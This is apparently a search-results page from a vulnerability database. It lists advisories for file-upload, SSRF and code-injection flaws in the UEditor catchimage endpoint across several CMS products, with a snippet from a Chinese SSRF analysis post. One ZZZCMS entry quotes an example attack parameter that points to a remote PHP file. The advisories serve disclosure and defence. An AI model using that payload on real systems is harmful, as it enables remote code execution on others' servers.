31 matches found
CVE-2023-2245
CVE-2023-2245 - hansunCMS 1.4.3 unrestricted upload . Affected component: the endpoint /ueditor/net/controller.ashx?action=catchimage in hansunCMS 1.4.3. Root cause described as manipulation allowing unrestricted upload, enabling remote exploitation. Sources indicate the vulnerability is critical...
HANSUNCMS 代码问题漏洞
HANSUNCMS is a website builder system of China HANSUN Technology HANSUN Company. HANSUNCMS 1.4.3 version of the code problematic vulnerability, the vulnerability stems from the file /ueditor/net/controller.ashx?action=catchimage there are problems, will lead to unrestricted uploads...
PT-2023-18506 · Hansuncms · Hansuncms
Name of the Vulnerable Software and Affected Versions: hansunCMS version 1.4.3 Description: A critical issue affects the /ueditor/net/controller.ashx?action=catchimage file, leading to unrestricted upload. The attack can be initiated remotely. The issue has been publicly disclosed and may be...
CVE-2021-27693
Server-side Request Forgery SSRF vulnerability in PublicCMS before 4.0.202011.b via /publiccms/admin/ueditor when the action is catchimage...
CVE-2021-27693
Server-side Request Forgery SSRF vulnerability in PublicCMS before 4.0.202011.b via /publiccms/admin/ueditor when the action is catchimage...
Server side request forgery (ssrf)
Server-side Request Forgery SSRF vulnerability in PublicCMS before 4.0.202011.b via /publiccms/admin/ueditor when the action is catchimage...
PT-2022-9841 · Publiccms · Publiccms
Name of the Vulnerable Software and Affected Versions: PublicCMS versions prior to 4.0.202011.b Description: The issue is related to a Server-side Request Forgery SSRF vulnerability. It affects the /publiccms/admin/ueditor endpoint when the action is catchimage. This allows for potential...
CVE-2019-16720
ZZZCMS zzzphp v1.7.2 does not properly restrict file upload in plugins/ueditor/php/controller.php?upfolder=news&action=catchimage, as demonstrated by uploading a .htaccess or .php5 file...
CVE-2019-10647
ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source parameter because of a lack of inc/zzzfile.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if th...
Code injection
ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source parameter because of a lack of inc/zzzfile.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if th...
UEditor SSRF漏洞(JSP版本)分析与复现
作者: 浮萍@猎户安全实验室 公众号:猎户安全实验室 前些时间测试的时候遇到了一个系统采用了UEditor编辑器,版本为1.4.3。已知该编辑器v1.4.3版本存在SSRF漏洞,虽然是Bool型的SSRF,除了可以进行内网探测外,也可以根据web应用指纹信息,之后进行进一步的测试。 0x01 前言 查看官方的更新日志可以发现UEditor编辑器在版本1.4.3.1修复了SSRF漏洞。...